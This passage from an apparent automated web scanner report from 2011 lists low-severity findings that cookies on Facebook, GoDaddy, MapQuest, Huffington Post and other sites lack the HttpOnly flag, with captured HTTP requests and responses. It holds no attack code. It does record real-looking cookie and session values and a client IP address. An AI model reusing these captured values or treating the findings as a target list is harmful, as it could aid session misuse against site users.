Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.81
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 115848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.72. http://www.facebook.com/stefanoboscolomarchi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/stefanoboscolomarchi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.47
Connection: close
Date: Thu, 05 May 2011 11:42:33 GMT
Content-Length: 145632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.73. http://www.facebook.com/theteebers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/theteebers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.23
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 67960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.74. http://www.facebook.com/wmoppert previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/wmoppert

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.45
Connection: close
Date: Thu, 05 May 2011 11:42:10 GMT
Content-Length: 39263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.75. https://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.76. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=bnJmV; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bnJmV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.47
X-Cnection: close
Date: Thu, 05 May 2011 12:37:53 GMT
Content-Length: 14457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.77. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.122
X-Cnection: close
Date: Thu, 05 May 2011 12:38:10 GMT
Content-Length: 40951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.78. https://www.facebook.com/help/contact.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/help/contact.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.79. https://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.80. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=Mkkns; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.81. https://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/pages/create.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.22.122
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 32123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.82. https://www.facebook.com/recover.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/recover.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

made_write_conn=1304595854; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
W=1304595854; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.83. https://www.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
HPBackground=DanicaImageOne; path=/
HPBackground=DanicaImageOne; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.84. https://www.godaddy.com/domains/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/domains/search.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.85. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.86. http://www.huffingtonpost.com/include/geopromo.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/include/geopromo.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

geocity=Dallas; expires=Thu, 05-May-2011 01:59:03 GMT; path=/; domain=.beta.huffingtonpost.com
geostate=Texas; expires=Thu, 05-May-2011 01:59:03 GMT; path=/; domain=.beta.huffingtonpost.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /include/geopromo.php HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.5.10.1304575105; s_pers=%20s_getnr%3D1304575139917-New%7C1367647139917%3B%20s_nrgvo%3DNew%7C1367647139919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 00:59:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 00:59:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: geocity=Dallas; expires=Thu, 05-May-2011 01:59:03 GMT; path=/; domain=.beta.huffingtonpost.com
Set-Cookie: geostate=Texas; expires=Thu, 05-May-2011 01:59:03 GMT; path=/; domain=.beta.huffingtonpost.com

11.87. http://www.huffingtonpost.com/users/logout/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/users/logout/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.88. http://www.mapquest.com/directions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mapquest.com
Path:	/directions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:39 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directions HTTP/1.1
Host: www.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; tsexpiry=1; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; t_Id=ZGVmYXVsdDpudWxs; c_Id=MjM5OjM5OQ%3D%3D;

Response

11.89. http://www.mapquest.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mapquest.com
Path:	/maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:39 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: www.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; tsexpiry=1; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; t_Id=ZGVmYXVsdDpudWxs; c_Id=MjM5OjM5OQ%3D%3D;

Response

11.90. http://www.mapquest.com/routeplanner previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mapquest.com
Path:	/routeplanner

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:40 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /routeplanner HTTP/1.1
Host: www.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; tsexpiry=1; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; t_Id=ZGVmYXVsdDpudWxs; c_Id=MjM5OjM5OQ%3D%3D;

Response

11.91. http://www.marketwatch.com/News/Story/Story.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/News/Story/Story.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.92. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.93. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:18 GMT; path=/
comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.94. http://www.moviefone.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moviefone.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outblush.com
Path:	/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerbargainist_POOL=1509626028.52514.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.outblush.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 11004
Date: Thu, 05 May 2011 10:58:54 GMT
Age: 0
Connection: close
Server: IBSrv 1.0
Set-Cookie: BIGipServerbargainist_POOL=1509626028.52514.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...

11.96. http://www.pageflakes.com/subscribe.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pageflakes.com
Path:	/subscribe.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

.PAGEFLAKESANON=2D84F226422240C5703E911FACF038965CBE1D927E8D870128FEE2134126E0FFA67B97854E5C922518693385A6B4067EECAD3E8ACA7EB04159F98FC62DDAAEDD17CC846A23850CC6D3ABC62F17775E93732C4095377032204EBB2EECD6DB7D97A5A7D8F3F66A2025E10F9515907FEFFC19E8E112D2560C8A6C9DC56D2138543AA99D38430E8FEFEB3EC0A3172C58D2C1E5448F6ADEB1AEB646A3F87830FDD0CA; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /subscribe.aspx HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 11:16:00 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=2D84F226422240C5703E911FACF038965CBE1D927E8D870128FEE2134126E0FFA67B97854E5C922518693385A6B4067EECAD3E8ACA7EB04159F98FC62DDAAEDD17CC846A23850CC6D3ABC62F17775E93732C4095377032204EBB2EECD6DB7D97A5A7D8F3F66A2025E10F9515907FEFFC19E8E112D2560C8A6C9DC56D2138543AA99D38430E8FEFEB3EC0A3172C58D2C1E5448F6ADEB1AEB646A3F87830FDD0CA; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Add feed
...[SNIP]...

11.97. http://www.popeater.com/ previous next

Summary

